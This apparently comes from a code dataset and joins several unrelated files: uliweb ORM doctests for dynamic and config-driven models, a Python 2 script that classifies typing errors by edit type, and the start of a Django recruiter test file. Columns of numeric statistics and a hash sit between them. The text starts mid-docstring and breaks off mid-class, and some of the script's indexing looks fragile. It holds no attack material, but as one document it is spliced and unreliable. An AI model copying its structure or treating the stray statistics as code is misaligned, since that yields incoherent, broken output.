>>> app = make_simple_application(project_dir='.', reuse=False)
>>> fields = [
... {'name':'year', 'type':'int'}
... ]
>>> U = create_model('user3', fields, basemodel='uliweb.contrib.auth.models.User')
>>> print U.properties.keys()
['username', 'locked', 'deleted', 'image', 'date_join', 'email', 'is_superuser', 'last_login', 'year', 'active', 'password', 'nickname', 'id']
>>> print hasattr(U, 'check_password')
True
"""
def test_dynamic_extend_model_3():
    # Doctest: __replace__=True replaces the registered 'user' model with
    # only the listed fields (the SQL shows just year + id), while methods
    # from the basemodel are still inherited.
    """
    >>> app = make_simple_application(project_dir='.', reuse=False)
    >>> fields = [
    ... {'name':'year', 'type':'int'}
    ... ]
    >>> U = create_model('user', fields, __replace__=True, basemodel='uliweb.contrib.auth.models.User')
    >>> U = get_model('user')
    >>> sql = print_model(U, skipblank=True)
    >>> sql
    'CREATE TABLE user (year INTEGER, id INTEGER NOT NULL, PRIMARY KEY (id));'
    >>> print hasattr(U, 'check_password')
    True
    """
def test_dynamic_extend_model_4():
    # Doctest: same as test_dynamic_extend_model_2 but with a '_reserved'
    # key on the field definition — property set is unchanged.
    """
    >>> app = make_simple_application(project_dir='.', reuse=False)
    >>> fields = [
    ... {'name':'year', 'type':'int', '_reserved':True}
    ... ]
    >>> U = create_model('user3', fields, basemodel='uliweb.contrib.auth.models.User')
    >>> print U.properties.keys()
    ['username', 'locked', 'deleted', 'image', 'date_join', 'email', 'is_superuser', 'last_login', 'year', 'active', 'password', 'nickname', 'id']
    >>> print hasattr(U, 'check_password')
    True
    """
def test_create_model_index():
    # Doctest: indexes= definitions are carried into the generated DDL
    # (a CREATE UNIQUE INDEX statement follows the CREATE TABLE).
    """
    >>> app = make_simple_application(project_dir='.')
    >>> fields = [
    ... {'name':'year', 'type':'int'}
    ... ]
    >>> indexes = [
    ... {'name':'user_idx', 'fields':['year'], 'unique':True},
    ... ]
    >>> U = orm.create_model('user', fields, indexes=indexes,
    ... __replace__=True, basemodel='uliweb.contrib.auth.models.User')
    >>> U = get_model('user')
    >>> print print_model(U, skipblank=True)
    CREATE TABLE user (year INTEGER, id INTEGER NOT NULL, PRIMARY KEY (id));CREATE UNIQUE INDEX user_idx ON "user" (year);
    """
def test_recreate_model():
    # Doctest: calling create_model() twice with the same definition is
    # idempotent — the second call produces identical DDL (including the
    # quoted "group" reference column) with no duplicated index.
    """
    >>> app = make_simple_application(project_dir='.')
    >>> fields = [
    ... {'name':'year', 'type':'int'},
    ... {'name':'group', 'type':'Reference', 'reference_class':'usergroup', 'collection_name':'myusers'}
    ... ]
    >>> indexes = [
    ... {'name':'user_idx', 'fields':['year'], 'unique':True},
    ... ]
    >>> U = orm.create_model('user', fields, indexes=indexes,
    ... __replace__=True, basemodel='uliweb.contrib.auth.models.User')
    >>> U = get_model('user')
    >>> print print_model(U, skipblank=True)
    CREATE TABLE user (year INTEGER, "group" INTEGER, id INTEGER NOT NULL, PRIMARY KEY (id));CREATE UNIQUE INDEX user_idx ON "user" (year);
    >>> U = orm.create_model('user', fields, indexes=indexes,
    ... __replace__=True, basemodel='uliweb.contrib.auth.models.User')
    >>> U = get_model('user')
    >>> print print_model(U, skipblank=True)
    CREATE TABLE user (year INTEGER, "group" INTEGER, id INTEGER NOT NULL, PRIMARY KEY (id));CREATE UNIQUE INDEX user_idx ON "user" (year);
    """
def test_model_config():
    # Doctest: model definitions stored in the model_config /
    # model_config_his tables drive get_model(): publishing a new
    # model_config_his version (here adding 'nickname') changes the
    # properties returned for 'user' on the next lookup.
    """
    >>> app = make_simple_application(project_dir='.', reuse=False)
    >>> M = get_model('model_config')
    >>> MH = get_model('model_config_his')
    >>> fields = [
    ... {'name':'year', 'type':'int'},
    ... {'name':'username', 'type':'str'},
    ... {'name':'age', 'type':'int'},
    ... {'name':'group', 'type':'Reference', 'reference_class':'usergroup', 'collection_name':'myusers'}
    ... ]
    >>> indexes = [
    ... {'name':'user_idx', 'fields':['year'], 'unique':True},
    ... ]
    >>> from uliweb.utils.common import get_uuid
    >>> from uliweb.utils import date
    >>> mh = MH(model_name='user', table_name='user', basemodel='Test.models.User',
    ... fields=fields, indexes=indexes, has_extension=False,
    ... uuid=get_uuid())
    >>> mh.save(version=True)
    True
    >>> m = M(model_name='user', uuid=mh.uuid, published_time=date.now())
    >>> m.save(version=True)
    True
    >>> from uliweb.contrib.model_config import find_model
    >>> print find_model(None, 'user')
    {'model_path': '', 'engines': ['default'], 'appname': 'uliweb.contrib.model_config'}
    >>> User = get_model('user')
    >>> User.migrate()
    >>> u = User(username='guest', age=30, year=2014)
    >>> u.save()
    True
    >>> a = User.get(1)
    >>> print repr(a)
    <User {'year':2014,'username':u'guest','age':30,'group':None,'id':1}>
    >>> fields = [
    ... {'name':'year', 'type':'int'},
    ... {'name':'username', 'type':'str'},
    ... {'name':'age', 'type':'int'},
    ... {'name':'nickname', 'type':'str'},
    ... {'name':'group', 'type':'Reference', 'reference_class':'usergroup', 'collection_name':'myusers'}
    ... ]
    >>> mh = MH(model_name='user', table_name='user', basemodel='Test.models.User',
    ... fields=fields, indexes=indexes, has_extension=False,
    ... uuid=get_uuid())
    >>> mh.save(version=True)
    True
    >>> m = M.get(M.c.model_name=='user')
    >>> m.uuid = mh.uuid
    >>> m.save(version=True)
    True
    >>> fields = [
    ... {'name':'year', 'type':'int'},
    ... {'name':'username', 'type':'str'},
    ... {'name':'age', 'type':'int'},
    ... {'name':'nickname', 'type':'str'},
    ... {'name':'group', 'type':'Reference', 'reference_class':'usergroup', 'collection_name':'myusers'}
    ... ]
    >>> mh = MH(model_name='user', table_name='user', basemodel='Test.models.User',
    ... fields=fields, indexes=indexes, has_extension=False,
    ... uuid=get_uuid())
    >>> mh.save(version=True)
    True
    >>> m = M.get(M.c.model_name=='user')
    >>> m.uuid = mh.uuid
    >>> m.save(version=True)
    True
    >>> M = get_model('user')
    >>> print M.properties.keys()
    ['username', 'group', 'year', 'age', 'nickname', 'id']
    """
def test_extension_model():
    # Doctest: has_extension=True creates a companion User_Extension model
    # reachable via instance.ext (OneToOne back-reference); publishing a
    # later version with has_extension=False drops the extension again.
    """
    >>> app = make_simple_application(project_dir='.', reuse=False)
    >>> M = get_model('model_config')
    >>> MH = get_model('model_config_his')
    >>> fields = [
    ... {'name':'year', 'type':'int'},
    ... {'name':'username', 'type':'str'},
    ... {'name':'age', 'type':'int'},
    ... {'name':'group', 'type':'Reference', 'reference_class':'usergroup', 'collection_name':'myusers'}
    ... ]
    >>> indexes = [
    ... {'name':'user_idx', 'fields':['year'], 'unique':True},
    ... ]
    >>> ext_fields = [
    ... {'name':'skill', 'type':'int'},
    ... {'name':'level', 'type':'int'},
    ... ]
    >>> ext_indexes = [
    ... {'name':'user_ext_idx', 'fields':['skill']}
    ... ]
    >>> from uliweb.utils.common import get_uuid
    >>> from uliweb.utils import date
    >>> MH.remove()
    >>> mh = MH(model_name='user', table_name='user', basemodel='Test.models.User',
    ... fields=fields, indexes=indexes, has_extension=True,
    ... extension_fields=ext_fields, extension_indexes=ext_indexes,
    ... uuid=get_uuid())
    >>> mh.save(version=True)
    True
    >>> M.remove()
    >>> m = M(model_name='user', uuid=mh.uuid, published_time=date.now())
    >>> m.save(version=True)
    True
    >>> from uliweb.contrib.model_config import find_model
    >>> print find_model(None, 'user')
    {'model_path': '', 'engines': ['default'], 'appname': 'uliweb.contrib.model_config'}
    >>> User = get_model('user')
    >>> User.remove()
    >>> User.migrate()
    >>> User.ext._model.migrate()
    >>> User.ext._model.remove()
    >>> u = User(username='guest', age=30, year=2014)
    >>> u.save()
    True
    >>> u.ext.skill = 2
    >>> u.ext.level = 3
    >>> u.ext.save()
    True
    >>> a = User.get(1)
    >>> print repr(a)
    <User {'year':2014,'username':u'guest','age':30,'group':None,'id':1}>
    >>> print repr(a.ext)
    <User_Extension {'_parent':<OneToOne:1>,'skill':2,'level':3,'id':1}>
    >>> fields = [
    ... {'name':'year', 'type':'int'},
    ... {'name':'username', 'type':'str'},
    ... {'name':'age', 'type':'int'},
    ... {'name':'nickname', 'type':'str'},
    ... {'name':'group', 'type':'Reference', 'reference_class':'usergroup', 'collection_name':'myusers'}
    ... ]
    >>> mh = MH(model_name='user', table_name='user', basemodel='Test.models.User',
    ... fields=fields, indexes=indexes, has_extension=False,
    ... uuid=get_uuid())
    >>> mh.save(version=True)
    True
    >>> m = M.get(M.c.model_name=='user')
    >>> m.uuid = mh.uuid
    >>> m.save(version=True)
    True
    >>> M = get_model('user')
    >>> print M.properties.keys()
    ['username', 'group', 'year', 'age', 'nickname', 'id']
    """
def test_model_config_app():
    # Doctest: config-driven models are flagged __mapping_only__, so
    # 'uliweb syncdb' reports them as SKIPPED(Mapping Table) instead of
    # creating real tables for them.
    """
    >>> app = make_simple_application(project_dir='.', reuse=False)
    >>> M = get_model('model_config')
    >>> MH = get_model('model_config_his')
    >>> fields = [
    ... {'name':'year', 'type':'int'},
    ... {'name':'username', 'type':'str'},
    ... {'name':'age', 'type':'int'},
    ... {'name':'group', 'type':'Reference', 'reference_class':'usergroup', 'collection_name':'myusers'}
    ... ]
    >>> indexes = [
    ... {'name':'user_idx', 'fields':['year'], 'unique':True},
    ... ]
    >>> ext_fields = [
    ... {'name':'skill', 'type':'int'},
    ... {'name':'level', 'type':'int'},
    ... ]
    >>> ext_indexes = [
    ... {'name':'user_ext_idx', 'fields':['skill']},
    ... ]
    >>> from uliweb.utils.common import get_uuid
    >>> from uliweb.utils import date
    >>> MH.remove()
    >>> mh = MH(model_name='user', table_name='user', basemodel='Test.models.User',
    ... fields=fields, indexes=indexes, has_extension=True,
    ... extension_fields=ext_fields, extension_indexes=ext_indexes,
    ... uuid=get_uuid())
    >>> mh.save(version=True)
    True
    >>> M.remove()
    >>> m = M(model_name='user', uuid=mh.uuid, published_time=date.now())
    >>> m.save(version=True)
    True
    >>> from uliweb.contrib.orm.commands import get_tables
    >>> tables = []
    >>> for name, t in get_tables('.').items():
    ... tables.append((name, t.__mapping_only__))
    >>> print tables
    [('model_config_his', False), ('user1', False), ('model_config', False), ('user_extension', True), ('user', True), ('usergroup', False)]
    >>> tables = []
    >>> for name, t in get_metadata().tables.items():
    ... tables.append((name, t.__mapping_only__))
    >>> print tables
    [('model_config_his', False), ('user1', False), ('model_config', False), ('user_extension', True), ('user', True), ('usergroup', False)]
    >>> manage.call('uliweb syncdb -v')
    Connection [Engine:default]:sqlite:///database.db
    <BLANKLINE>
    [default] Creating [1/6, uliweb] model_config_his...EXISTED
    [default] Creating [2/6, uliweb] user1...EXISTED
    [default] Creating [3/6, uliweb] model_config...EXISTED
    [default] Creating [4/6, uliweb] user_extension...SKIPPED(Mapping Table)
    [default] Creating [5/6, uliweb] user...SKIPPED(Mapping Table)
    [default] Creating [6/6, uliweb] usergroup...EXISTED
    """
# app = make_simple_application(project_dir='.', reuse=False)
# set_echo(True)
# M = get_model('model_config')
# MH = get_model('model_config_his')
# fields = [
# ('year', 'int'),
# ('username', 'str'),
# ('age', 'int'),
# ('group', 'Reference', {'reference_class':'usergroup', 'collection_name':'myusers'})
# ]
# indexes = [
# ('user_idx', ['year'], {'unique':True})
# ]
# ext_fields = [
# ('skill', 'int'),
# ('level', 'int'),
# ]
# ext_indexes = [
# ('user_ext_idx', ['skill'])
# ]
# from uliweb.utils.common import get_uuid
# from uliweb.utils import date
# MH.remove()
# mh = MH(model_name='user', table_name='user', basemodel='Test.models.User',
# fields=fields, indexes=indexes, has_extension=True,
# extension_fields=ext_fields, extension_indexes=ext_indexes,
# uuid=get_uuid())
# mh.save(version=True)
#
# M.remove()
# m = M(name='user', cur_uuid=mh.uuid, submitted_time=date.now())
# m.save(version=True)
# from uliweb.contrib.orm.commands import get_tables
#
# tables = []
# for name, t in get_tables('.').items():
# tables.append((name, t.__mapping_only__))
# print tables
#
# tables = []
# for name, t in get_metadata().tables.items():
# tables.append((name, t.__mapping_only__))
# print tables
# manage.call('uliweb syncdb -v')
| 37.057851
| 146
| 0.565566
| 1,564
| 13,452
| 4.686061
| 0.095908
| 0.030564
| 0.022513
| 0.029472
| 0.883477
| 0.84691
| 0.84691
| 0.843089
| 0.828899
| 0.821531
| 0
| 0.005519
| 0.205248
| 13,452
| 362
| 147
| 37.160221
| 0.680011
| 0.860244
| 0
| 0
| 0
| 0
| 0.074738
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.526316
| true
| 0
| 0.263158
| 0
| 0.789474
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 10
|
4c474a5eeaa98ddbdfb98440c24a9a9d6faaa809
| 15,881
|
py
|
Python
|
additional_analysis/extract_error.py
|
hiyuricu/masters-thesis
|
a8b6f17bd3c1d2182223616aacc8fdc77456505e
|
[
"MIT"
] | 1
|
2016-01-14T12:55:24.000Z
|
2016-01-14T12:55:24.000Z
|
additional_analysis/extract_error.py
|
hiyuricu/masters-thesis
|
a8b6f17bd3c1d2182223616aacc8fdc77456505e
|
[
"MIT"
] | 1
|
2016-01-20T06:48:12.000Z
|
2016-01-20T06:48:50.000Z
|
additional_analysis/extract_error.py
|
hiyuricu/masters-thesis
|
a8b6f17bd3c1d2182223616aacc8fdc77456505e
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Script that extracts character-level typing mistakes.
# sys.argv[1] is corrected_error_list.txt or un_corrected_error_list.txt;
# sys.argv[2] is more_than_3_additonal_analysis_un_corrected_error.txt.
# The output files additonal_analysis_corrected_error.txt and
# additonal_analysis_un_corrected_error.txt carry 9 fields per record:
# word before editing, word after editing, edit distance, typing speed,
# user name, error class, error_string, related_string, error position.
# For a deletion (damerau_distance_type == "del") the deleted character is
# error_string and the character just before it is related_string.
# (For "del" it would arguably be better to use the characters on both
# sides of the deleted one as related_string.)
# For an insertion (damerau_distance_type == "ins") the character after the
# inserted one (the character typed in place of the skipped one) is
# error_string and the inserted character is related_string.
# For a substitution (damerau_distance_type == "sub") the replaced character
# is error_string and the replacing character is related_string.
# insertion, deletion, substitution, transposition
# ins, del, sub, tra
import sys
def pair_compare():
    # Classify every typo pair from sys.argv[1] by Damerau edit type
    # (ins/del/sub/tra) and print one record per detected character error;
    # pairs with edit distance >= 3 are copied verbatim to sys.argv[2].
    # typing_list layout (assumed from usage — TODO confirm against the
    # producer of the input file):
    #   [0] typed word, [1] intended word, [2] edit distance,
    #   [3] typing speed, [4] user name.
    with open(sys.argv[2], "w") as wf:
        for line in open(sys.argv[1]):
            damerau_distance_type = ""
            error_string = ""
            related_string = ""
            error_position = ""
            line = line.strip()
            typing_list = line.split()
            if int(typing_list[2]) >= 3:
                # Distance >= 3 is too ambiguous to classify: pass through.
                wf.write(line + "\n")
            elif typing_list[2] == "1":
                # Single edit: the length difference fixes the edit type.
                if len(typing_list[0]) == len(typing_list[1]):
                    damerau_distance_type = "sub"
                elif len(typing_list[0]) > len(typing_list[1]):
                    damerau_distance_type = "del"
                else:
                    damerau_distance_type = "ins"
                for i in range(len(typing_list[0])):
                    if typing_list[0][i] != typing_list[1][i]:
                        if damerau_distance_type == "sub":
                            error_position = str(i + 1)
                            error_string = typing_list[0][i]
                            related_string = typing_list[1][i]
                        elif damerau_distance_type == "del":
                            error_position = str(i + 1)
                            error_string = typing_list[0][i]
                            if i != 0:
                                related_string = typing_list[1][i - 1]
                            else:
                                # No preceding character: use a sentinel.
                                related_string = "xxx"
                        elif damerau_distance_type == "ins":
                            error_position = str(i + 1)
                            error_string = typing_list[0][i]
                            related_string = typing_list[1][i]
                        print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                        break
                    elif i == len(typing_list[0]) - 1:  # len(typing_list[0]) < len(typing_list[1]) and the inserted character sits at the very end of the word
                        error_position = str(i + 2)
                        error_string = "_"  # the inserted character is at the last position
                        related_string = typing_list[1][i + 1]
                        print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                        break
                    elif i == len(typing_list[1]) - 1:  # len(typing_list[0]) > len(typing_list[1]) and the deleted character sits at the very end of the word
                        error_position = str(i + 2)
                        error_string = typing_list[0][i + 1]
                        related_string = typing_list[1][i]
                        print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                        break
            elif typing_list[2] == "2":
                # Distance 2: length delta narrows the possible edit pairs.
                if len(typing_list[0]) - len(typing_list[1]) == 2:
                    # Two deletions.
                    damerau_distance_type = "del"
                    error_number = 1
                    for i in range(len(typing_list[1])):
                        if typing_list[0][i] != typing_list[1][i] and error_number == 1:
                            error_number += 1
                            error_position = str(i + 1)
                            error_string = typing_list[0][i]
                            related_string = typing_list[1][i - 1]
                            print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                        if typing_list[0][i + 1] != typing_list[1][i] and error_number == 2:
                            error_position = str(i + 2)
                            error_string = typing_list[0][i + 1]
                            related_string = typing_list[1][i - 1]
                            print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                            break
                        if i == len(typing_list[1]) - 1:
                            # Both deleted characters are trailing.
                            if error_number == 1:
                                error_position = str(i + 2)
                                error_string = typing_list[0][i + 1]
                                related_string = typing_list[1][i]
                                print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                                error_position = str(i + 3)
                                error_string = typing_list[0][i + 2]
                                related_string = typing_list[1][i]
                                print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                elif len(typing_list[0]) - len(typing_list[1]) == -2:
                    # Two insertions.
                    damerau_distance_type = "ins"
                    error_number = 1
                    for i in range(len(typing_list[0])):
                        if typing_list[0][i] != typing_list[1][i] and error_number == 1:
                            error_number += 1
                            error_position = str(i + 1)
                            error_string = typing_list[0][i]
                            related_string = typing_list[1][i]
                            print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                        if typing_list[0][i] != typing_list[1][i + 1] and error_number == 2:
                            error_position = str(i + 1)
                            error_string = typing_list[0][i]
                            related_string = typing_list[1][i + 1]
                            print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                            break
                        if i == len(typing_list[0]) - 1:
                            # Both inserted characters are trailing.
                            if error_number == 1:
                                error_position = str(i + 2)
                                error_string = "_"
                                related_string = typing_list[1][i + 1]
                                print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                                error_position = str(i + 3)
                                error_string = "_"
                                related_string = typing_list[1][i + 2]
                                print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                elif len(typing_list[0]) - len(typing_list[1]) == 0:
                    # Equal length: transposition, double substitution, or
                    # an insertion paired with a deletion.
                    tra_flag = 0
                    sub_flag = 0
                    ins_flag = 0
                    del_flag = 0
                    for i in range(len(typing_list[0])):
                        if typing_list[0][i] != typing_list[1][i]:
                            if typing_list[0][i] == typing_list[1][i + 1] and typing_list[0][i + 1] == typing_list[1][i]:
                                # Adjacent characters swapped.
                                damerau_distance_type = "tra"
                                error_position = str(i + 1)
                                error_string = typing_list[0][i]
                                related_string = typing_list[1][i]
                                print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                                tra_flag = 1
                                break
                    sub_count = 0
                    for i in range(len(typing_list[0])):
                        if typing_list[0][i] != typing_list[1][i]:
                            sub_count += 1
                    if tra_flag == 0 and sub_count == 2:
                        # Exactly two mismatched positions: two substitutions.
                        sub_flag = 1
                        damerau_distance_type = "sub"
                        for i in range(len(typing_list[0])):
                            if typing_list[0][i] != typing_list[1][i]:
                                error_position = str(i + 1)
                                error_string = typing_list[0][i]
                                related_string = typing_list[1][i]
                                print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                    if tra_flag == 0 and sub_flag == 0:
                        # Remaining case: one insertion plus one deletion.
                        for i in range(len(typing_list[0])):
                            if ins_flag == 0 and del_flag == 0 and typing_list[0][i] != typing_list[1][i]:
                                if typing_list[0][i + 1] == typing_list[1][i]:
                                    del_flag = 1
                                    damerau_distance_type = "del"
                                    error_position = str(i + 1)
                                    error_string = typing_list[0][i]
                                    related_string = typing_list[1][i - 1]
                                    print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                                else:
                                    ins_flag = 1
                                    damerau_distance_type = "ins"
                                    error_position = str(i + 1)
                                    error_string = typing_list[0][i]
                                    related_string = typing_list[1][i]
                                    print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                            if del_flag == 1 and typing_list[0][i + 1] != typing_list[1][i]:
                                damerau_distance_type = "ins"
                                error_position = str(i + 1)
                                error_string = typing_list[0][i + 1]
                                related_string = typing_list[1][i]
                                print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                                break
                            if ins_flag == 1 and typing_list[0][i] != typing_list[1][i + 1]:
                                damerau_distance_type = "del"
                                error_position = str(i + 1)
                                error_string = typing_list[0][i]
                                related_string = typing_list[1][i]
                                print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                                break
                            if ins_flag == 1 and i == len(typing_list[0]) - 2:
                                # Matching deletion falls at the word end.
                                damerau_distance_type = "del"
                                error_position = str(i + 2)
                                error_string = typing_list[0][i + 1]
                                related_string = typing_list[1][i + 1]
                                print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                                break
                            if del_flag == 1 and i == len(typing_list[0]) - 2:
                                # Matching insertion falls at the word end.
                                damerau_distance_type = "ins"
                                error_position = str(i + 2)
                                error_string = "_"
                                related_string = typing_list[1][i + 1]
                                print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                                break
                elif len(typing_list[0]) - len(typing_list[1]) == 1:
                    # One character longer: a deletion plus a substitution.
                    del_flag = 0
                    sub_flag = 0
                    for i in range(len(typing_list[1])):
                        if del_flag == 0 and sub_flag == 0 and typing_list[0][i] != typing_list[1][i]:
                            if i == len(typing_list[1]) - 1 or typing_list[0][i + 1] != typing_list[1][i + 1] and typing_list[0][i + 1] != typing_list[1][i]:
                                # Both edits are adjacent: report del then sub.
                                damerau_distance_type = "del"
                                error_position = str(i + 1)
                                error_string = typing_list[0][i]
                                related_string = typing_list[1][i - 1]
                                print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                                damerau_distance_type = "sub"
                                error_position = str(i + 1)
                                error_string = typing_list[0][i + 1]
                                related_string = typing_list[1][i]
                                print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                                break
                            elif typing_list[0][i + 1] == typing_list[1][i]:
                                del_flag = 1
                                damerau_distance_type = "del"
                                error_position = str(i + 1)
                                error_string = typing_list[0][i]
                                related_string = typing_list[1][i - 1]
                                print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                            else:
                                sub_flag = 1
                                damerau_distance_type = "sub"
                                error_position = str(i + 1)
                                error_string = typing_list[0][i]
                                related_string = typing_list[1][i]
                                print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                        elif del_flag == 1 and typing_list[0][i + 1] != typing_list[1][i]:
                            damerau_distance_type = "sub"
                            error_position = str(i + 2)
                            error_string = typing_list[0][i + 1]
                            related_string = typing_list[1][i]
                            print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                            break
                        elif sub_flag == 1 and typing_list[0][i] != typing_list[1][i]:
                            damerau_distance_type = "del"
                            error_position = str(i + 1)
                            error_string = typing_list[0][i]
                            related_string = typing_list[1][i - 1]
                            print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                            break
                        elif sub_flag == 1 and i == len(typing_list[1]) - 1:
                            # Deleted character is the trailing one.
                            damerau_distance_type = "del"
                            error_position = str(i + 1)
                            error_string = typing_list[0][i + 1]
                            related_string = typing_list[1][i]
                            print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                            break
                elif len(typing_list[0]) - len(typing_list[1]) == -1:
                    # One character shorter: an insertion plus a substitution.
                    ins_flag = 0
                    sub_flag = 0
                    for i in range(len(typing_list[0])):
                        if ins_flag == 0 and sub_flag == 0 and typing_list[0][i] != typing_list[1][i]:
                            if i == len(typing_list[0]) - 1 or typing_list[0][i + 1] != typing_list[1][i + 1] and typing_list[0][i] != typing_list[1][i + 1]:
                                # Both edits are adjacent: report ins then sub.
                                damerau_distance_type = "ins"
                                error_position = str(i + 1)
                                error_string = typing_list[1][i + 1]
                                related_string = typing_list[1][i]
                                print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                                damerau_distance_type = "sub"
                                error_position = str(i + 2)
                                error_string = typing_list[0][i]
                                related_string = typing_list[1][i + 1]
                                print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                                break
                            elif typing_list[0][i] == typing_list[1][i + 1]:
                                ins_flag = 1
                                damerau_distance_type = "ins"
                                error_position = str(i + 1)
                                error_string = typing_list[0][i]
                                related_string = typing_list[1][i]
                                print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                            else:
                                sub_flag = 1
                                damerau_distance_type = "sub"
                                error_position = str(i + 1)
                                error_string = typing_list[0][i]
                                related_string = typing_list[1][i]
                                print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                        elif ins_flag == 1 and typing_list[0][i] != typing_list[1][i + 1]:
                            damerau_distance_type = "sub"
                            error_position = str(i + 1)
                            error_string = typing_list[0][i]
                            related_string = typing_list[1][i + 1]
                            print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                            break
                        elif sub_flag == 1 and typing_list[0][i] != typing_list[1][i]:
                            damerau_distance_type = "ins"
                            error_position = str(i + 1)
                            error_string = typing_list[0][i]
                            related_string = typing_list[1][i]
                            print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                            break
                        elif sub_flag == 1 and i == len(typing_list[0]) - 1:
                            # Inserted character is the trailing one.
                            damerau_distance_type = "ins"
                            error_position = str(i + 2)
                            error_string = "_"
                            related_string = typing_list[1][i + 1]
                            print typing_list[0], typing_list[1], typing_list[2], typing_list[3], typing_list[4], damerau_distance_type, error_string, related_string, error_position
                            break
# Script entry point: classify the pairs when run from the command line.
if __name__ == "__main__":
    pair_compare()
| 47.978852
| 162
| 0.662742
| 2,386
| 15,881
| 4.0943
| 0.044426
| 0.330638
| 0.123861
| 0.076159
| 0.896202
| 0.89395
| 0.888934
| 0.879824
| 0.874092
| 0.865698
| 0
| 0.037875
| 0.211951
| 15,881
| 331
| 163
| 47.978852
| 0.742709
| 0.059442
| 0
| 0.783688
| 0
| 0
| 0.007439
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.003546
| null | null | 0.117021
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4c54882ddebfd13ca1a1ce9a6567ffb2ee97cebf
| 112,782
|
py
|
Python
|
recruiter/tests.py
|
ashwin31/opensource-job-portal
|
2885ea52f8660e893fe0531c986e3bee33d986a2
|
[
"MIT"
] | 1
|
2021-09-27T05:01:39.000Z
|
2021-09-27T05:01:39.000Z
|
recruiter/tests.py
|
kiran1415/opensource-job-portal
|
2885ea52f8660e893fe0531c986e3bee33d986a2
|
[
"MIT"
] | null | null | null |
recruiter/tests.py
|
kiran1415/opensource-job-portal
|
2885ea52f8660e893fe0531c986e3bee33d986a2
|
[
"MIT"
] | 1
|
2022-01-05T09:02:32.000Z
|
2022-01-05T09:02:32.000Z
|
from django.test import TestCase
from django.core.files.uploadedfile import SimpleUploadedFile
from datetime import datetime
from django.urls import reverse
import json
from .forms import (JobPostForm, Company_Form, User_Form, ChangePasswordForm,
PersonalInfoForm, MobileVerifyForm, MailTemplateForm, MenuForm,
RecruiterForm, EditCompanyForm)
from peeldb.models import (User, Country, State, City, Skill,
Qualification, Industry, FunctionalArea, JobPost, FacebookPost,
Company, Menu, InterviewLocation, AgencyCompany,
AgencyCompanyCatogery, )
class job_post_form_test(TestCase):
    """Validation tests for JobPostForm.

